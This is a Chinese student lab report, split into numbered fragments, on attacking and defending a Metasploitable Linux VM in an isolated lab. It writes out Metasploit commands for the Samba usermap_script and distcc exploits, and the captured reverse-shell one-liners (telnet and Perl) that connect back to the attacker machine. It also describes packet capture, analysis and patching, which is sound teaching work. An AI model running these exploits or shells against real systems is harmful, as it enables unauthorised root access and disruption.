1、Linux系统攻防对抗实践一、实践目的通过Linux系统攻防对抗实践,加深对Linux系统的认识,同时掌握Linux漏洞入侵和架设防御的初步方法。二、实践内容在Metasploit渗透攻击框架软件中寻找一个针对Linux系统服务的渗透攻击模块,在网络安全攻防实验环境中部署有漏洞的环境(如渗透利用第三方网络服务,需要找到并安装存在特定漏洞的版本),并使用metasploit进行攻击。攻击方使用Metasploit渗透软件针对Linux Metasploitable靶机实施网络攻击,防御方则在Metasploitatble上使用Tcpdump或Wireshark或Snort工具捕获攻击流,并分析出
2、攻击者利用了哪个安全漏洞进行攻击,从官方网站上下载该安全漏洞补丁进行系统修补,双方合作给出攻防过程报告。三、实验环境为了完成本次实验,我们部署了如下的实验环境。攻守双方使用两台笔记本电脑,并将它们直连成为一个局域网。在攻守双方的笔记本电脑上部 署Vmware Workstation软件,并分别建立攻击机、扫描机和防守机。其中攻方使用BackTrack4系统,并辅助使用WinXPattacker进行扫 描;守方使用Ubuntu 8.04Metasploitable系统。如下图,三台虚拟机使用Bridge方式联网,攻击机IP地址192.168.200.10,扫描机IP地址192.168.200.2
3、;防守机IP地址192.168.200.11。四、攻防实践过程攻守双方首先将虚拟机启动起来,配置好网络环境并测试网络通畅后,攻守双发分别进行接下来的操作。攻方过程漏洞扫描及结果分析为了确认防守方系统漏洞,攻方在扫描机上使用X-Scan 3.3对防守机进行了一次全面漏洞扫描。其中防守机开启的服务和具体的漏洞如下,查看详细的扫描报告,可以得知该主机很多重要信息,a) 从139端口可以获取该系统主机名为“METASPLOITABLE”,注释“metasploitable server (Samba 3.0.20-Debian)”;b) 主机系统中存在许多用户,共35个,其中被禁止的33个,存活使用用
4、户user、msfadmin;c) 系统存在弱口令,用户user、msfadmin密码与用户名一样,使用net use命令能够建立连接查看共享资源。ftp开放版本信息 ProFTPD 1.3.1 Server (Debian),user这个用户在ftp中也可以使用;d) telnet服务开放,可确定该系统为Ubuntu 8.04,用户user、msfadmin可以登录,并获得相应权限。如果不存在弱口令,通过截获该telnet数据也能获取用户口令。攻击方式选择根据上面的分析结果,最简单的攻击方式就是通过telnet使用user或msfadmin用户登录即可,但这样的攻击并不是我们的实验目的,因此
5、我们暂时忽略系统弱口令的问题,通过第三方软件的漏洞获取系统的控制权。从上面的漏洞扫描可以看出,防守机的漏洞很多,我们可以使用SMB漏洞、distcc漏洞等进行攻击。因为SMB是Samba软件的服务,而 Samba服 务是运行在root权限下,所以一旦攻击成功,将获得权限为root的shell。我们本次实验主要使用SMB漏洞进行攻击,并尝试使用distcc漏 洞。攻击入侵完成了以上的分析,我们终于进入了今天的重头戏,攻击环节。在命令行窗口输入命令msfconsole将开启我们要使用的攻击工具:metasploit,如下图,首先,我们使用SMB漏洞对防御机进行攻击,并设定payload为rever
6、se(在没有防火墙的情况下,选择任意的shell payload都是可以的,本实验的payload是任意选取的),依次输入如下命令,使用SMB漏洞对防守机进行攻击,use exploit/multi/samba/usermap_scriptset payload cmd/unix/reverseset rhost 192.168.200.11set lhost 192.168.200.10exploit如下图,攻击后成功的获得了一个root权限的shell,攻击成功!断开当前的连接,依次输入如下命令,使用distcc漏洞进行攻击。backuse exploit/unix/misc/distcc
7、_execset payload cmd/unix/reverse_perlset rhost 192.168.200.11set lhost 192.168.200.10exploit如下图,攻击成功后出现一个可以使用的shell,但是没有root权限。但继续输入命令时却没有反应,后证实是被防守方人为中断了。为了使用更高权限的命令,我们需要root权限的shell。因此再次使用SMB漏洞进行攻击。在命令行下输入如下命令,backuse exploit/multi/samba/usermap_scriptset payload cmd/unix/reverseset rhost 192.168
8、.200.11set lhost 192.168.200.10exploit然后在获得的shell中输入reboot命令,如下图,这时,防守机系统重启了,攻击成功!守方过程防守机上观察到的攻击迹象在防守机启动之后,立即使用如下命令抓取系统接收和发送的报文,并将结果保存到result.cap文件中。sudo tcpdump s 00 w result.cap &然后等待一段时间后,使用如下命令查看系统进程,ps e | more发现数个可疑的telnet进程,后来证实其为攻击时使用的shell。如下图,果断将telnet进程杀掉。但随后不久,收到一个来自用户root的消息,机器便重启了报文分析为
9、了弄清楚重启的真正原因。当机器重启之后,果断断网。导出抓取的报文文件,并使用wireshark进行分析。简单的查看抓取到的报文,在短短的30分钟内,一共有128768个报文。如此巨量的报文中,绝大多数报文都是成片的同一种协议的报文,如下图,因此可以断定,攻击机正在进行扫描,而真正的攻击应该在最后。从后向前查看报文内容发现,倒数第二条报文是一个TCP数据包,其中报文的内容是正是reboot!可以断定正是这条命令导致了系统重启。经过对报文仔细的分析,可以确定的攻击有三次,分别如下图所示,其中攻击的漏洞和携带的攻击脚本分别为,漏洞名称 相关网址 攻击脚本 执行的命令 SMB漏洞 CVE-2007-2
10、447 http:/www.samba.org/samba/security/CVE-2007-2447.htmlnohup sh -c (sleep 4495|telnet 192.168.200.10 4444|while : ; do sh & break; done 2&1|telnet 192.168.200.10 4444 /dev/null 2&1 &)idusersDistcc漏洞 CVE-2004-2687http:/cve.mitre.org/cgi-bin/cvename.cgi?name=2004-2687perl -MIO -e $p=fork;exit,if($p)
11、;$c=new IO:Socket:INET(PeerAddr,”192.168.200.10:4444”);STDIN-fdopen($c,r);$-fdopen($c,w);system$_ while;idusers同第一个 同第一个同第一个idreboot漏洞修补由于防守机是ubuntu系统,所以很容易将软件升级到最新版本。在命令行执行如下命令,sudo apt-get updatesudo apt-get install samba或者将相应的服务禁掉,sudo /etc/init.d/samba stopsudo /etc/init.d/distcc stop但是升级distcc时会提示没有更新的版本,到其官网上下载最新版本,卸载旧版本并安装后可以修补漏洞。五、攻防实践总结实践中遇到问题和总结的经验,攻方a) 漏洞选择,因为有文档指出Metasploitable靶机存在的漏洞,所以在这个方向上可以减少攻击过程中尝试的漏洞;b) 如果获得的shell权限不是root级别的,需要继续使用本地溢出进行提权,本人对这些漏洞信息掌握很少。守方a) 抓取的报文数量巨大,从中找出有用的信息比较困难。b) 从攻击的过程中推测被利用的漏洞必须具备相当的背景知识,并且需要熟练运用搜索引擎和官方网站。